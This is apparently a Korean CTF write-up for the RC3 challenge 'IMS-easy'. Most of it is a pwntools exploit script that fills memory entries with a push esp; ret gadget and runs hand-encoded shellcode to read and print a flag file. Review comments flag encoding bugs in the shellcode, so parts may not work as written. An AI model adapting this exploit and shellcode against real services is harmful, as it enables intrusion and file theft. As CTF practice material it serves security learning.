RC3 CTF에서 낸 문제다.
쉘코드는 그냥 하드 코딩했다.
이상하게 로컬에서는 풀리는데 리모트로는 안풀린다 왜지 ㅂㄷ
어쨌든 아래는 사용한 페이로드
import struct
import time

from pwn import *
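# Exploit for RC3 CTF "IMS-easy".
#
# The target stores fixed-size entries -- 8 bytes of "code" followed by a
# 4-byte integer "ID" -- back to back, so the bytes we submit end up
# contiguous in memory.  Seven entries are filled with a `push esp ; ret`
# gadget (presumably overwriting a saved return address; confirm against the
# binary), which hands execution to the entries that follow, where the
# open/read/write shellcode below prints the flag.
#
# Runs under Python 2 (the original) and Python 3 pwntools: only bytes
# literals, one-argument print() and struct are used.

HOST, PORT = "ims.ctf.rc3.club", 7777      # use process("IMS-easy") locally

GADGET_PUSH_ESP_RET = 0x080bfb66    # push esp ; ret
BSS_BUF = 0x080f22c0                # .bss scratch buffer for the flag bytes
FLAG_READ_LEN = 0x32                # bytes read from the flag file and echoed

# On-wire entry layout, in stream order: 8 bytes of code, then a 4-byte ID.
ENTRY_CODE_LEN = 8
ENTRY_ID_LEN = 4
ENTRY_LEN = ENTRY_CODE_LEN + ENTRY_ID_LEN

# Gadget-filled entries sent before the shellcode.  Hand-tuned in the
# original (presumably pads up to the saved return address) -- re-check
# against the binary before reusing with a different build.
N_DUMMY = 7

# open("//home/IMS-easy/flag.txt"); read(fd, BSS_BUF, 0x32); write(1, BSS_BUF, 0x32)
# The path is pushed in 4-byte pieces, last piece first, after a NUL dword.
SHELLCODE = b"".join([
    b"\x31\xc0",                            # xor  eax, eax
    b"\x50",                                # push eax          ; NUL terminator
    b"\x68\x2e\x74\x78\x74",                # push ".txt"
    b"\x68\x66\x6c\x61\x67",                # push "flag"
    b"\x68\x61\x73\x79\x2f",                # push "asy/"
    b"\x68\x4d\x53\x2d\x65",                # push "MS-e"
    b"\x68\x6d\x65\x2f\x49",                # push "me/I"
    b"\x68\x2f\x2f\x68\x6f",                # push "//ho"   -> esp = "//home/IMS-easy/flag.txt"
    b"\x89\xe3",                            # mov  ebx, esp     ; pathname
    # NOTE(review): 89 c8 decodes as `mov eax, ecx`, not `mov ecx, eax`
    # (89 c1).  It discards the zeroed eax and never sets ecx (the open()
    # flags), so eax only ends up as 5 below if ecx's upper bytes already
    # happen to be zero.  Kept byte-for-byte; confirm with a disassembler
    # before changing -- this is a candidate for the local/remote difference.
    b"\x89\xc8",                            # mov  eax, ecx
    b"\xb0\x05",                            # mov  al, 5        ; SYS_open
    b"\xcd\x80",                            # int  0x80
    b"\x89\xc3",                            # mov  ebx, eax     ; fd
    b"\xb9" + struct.pack("<I", BSS_BUF),   # mov  ecx, BSS_BUF
    b"\x6a" + struct.pack("<B", FLAG_READ_LEN),  # push 0x32
    b"\x5a",                                # pop  edx          ; count
    b"\xb0\x03",                            # mov  al, 3        ; SYS_read
    b"\xcd\x80",                            # int  0x80
    b"\x6a\x01",                            # push 1
    b"\x5b",                                # pop  ebx          ; fd = stdout
    b"\xb9" + struct.pack("<I", BSS_BUF),   # mov  ecx, BSS_BUF
    b"\x6a" + struct.pack("<B", FLAG_READ_LEN),  # push 0x32
    b"\x5a",                                # pop  edx          ; count
    b"\xb0\x04",                            # mov  al, 4        ; SYS_write
    b"\xcd\x80",                            # int  0x80
])


def dummy_entry():
    """Return the (id, code) entry whose ID and both code halves are the gadget.

    Every 4-byte slot of the entry holds ``push esp ; ret`` so the address is
    hit wherever the saved return address falls inside it.
    """
    gadget_twice = struct.pack("<II", GADGET_PUSH_ESP_RET, GADGET_PUSH_ESP_RET)
    return (GADGET_PUSH_ESP_RET, gadget_twice)


def shellcode_entries(shellcode):
    """Cut *shellcode* into (id, code) entries in memory order.

    The stream is NOP-padded to a whole number of entries and every ID is
    decoded as a little-endian u32 -- the same way the target stores it -- so
    the bytes land in memory in shellcode order.  Returns [] for empty input.

    The original script hand-typed the final ID as ``0x9090cd80``; stored
    little-endian that is ``80 cd 90 90`` (``or ch, 0x90 ; nop``), not the
    intended ``cd 80 90 90`` (``int 0x80 ; nop ; nop``, i.e. ``0x909080cd``),
    so the write syscall was never encoded.  Deriving every ID from the
    padded bytes removes that class of mistake.
    """
    pad = (-len(shellcode)) % ENTRY_LEN
    stream = shellcode + b"\x90" * pad
    entries = []
    for off in range(0, len(stream), ENTRY_LEN):
        code = stream[off:off + ENTRY_CODE_LEN]
        raw_id = stream[off + ENTRY_CODE_LEN:off + ENTRY_LEN]
        entries.append((struct.unpack("<I", raw_id)[0], code))
    return entries


def build_payload(entries):
    """Serialise *entries* as the menu input that adds them, then option 4.

    Each entry becomes ``1\\n<id>\\n<code>\\n`` (menu choice, decimal ID,
    raw code), matching what add_entry() sends, so the file can be replayed
    with ``./IMS-easy < payload``.
    """
    parts = [b"1\n" + str(entry_id).encode() + b"\n" + code + b"\n"
             for entry_id, code in entries]
    parts.append(b"4\n")
    return b"".join(parts)


def add_entry(con, entry_id, code):
    """Drive menu option 1 on *con* to store one (id, code) entry.

    Echoes each prompt so a stalled run shows where it stopped; the two
    trailing recvline() calls swallow the confirmation lines the target
    prints after an add.
    """
    print(con.recvuntil(b"Choose: "))
    con.sendline(b"1")
    print(con.recvuntil(b"ID: "))
    con.sendline(str(entry_id).encode())
    print(con.recvuntil(b"code: "))
    con.sendline(code)
    con.recvline()
    con.recvline()


def main():
    """Connect, push the gadget padding and shellcode, trigger option 4."""
    entries = [dummy_entry()] * N_DUMMY + shellcode_entries(SHELLCODE)

    # Write the replay file before talking to the target so it survives a
    # Ctrl-C in interactive() (the original only wrote it afterwards).
    with open("./payload", "wb") as f:
        f.write(build_payload(entries))

    con = remote(HOST, PORT)
    try:
        for entry_id, code in entries:
            add_entry(con, entry_id, code)
        print(con.recvuntil(b"Choose: "))
        con.sendline(b"4")              # option 4 returns into the gadget
        time.sleep(1)
        con.interactive()
    finally:
        con.close()


if __name__ == "__main__":
    main()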
다시 풀어봤는데..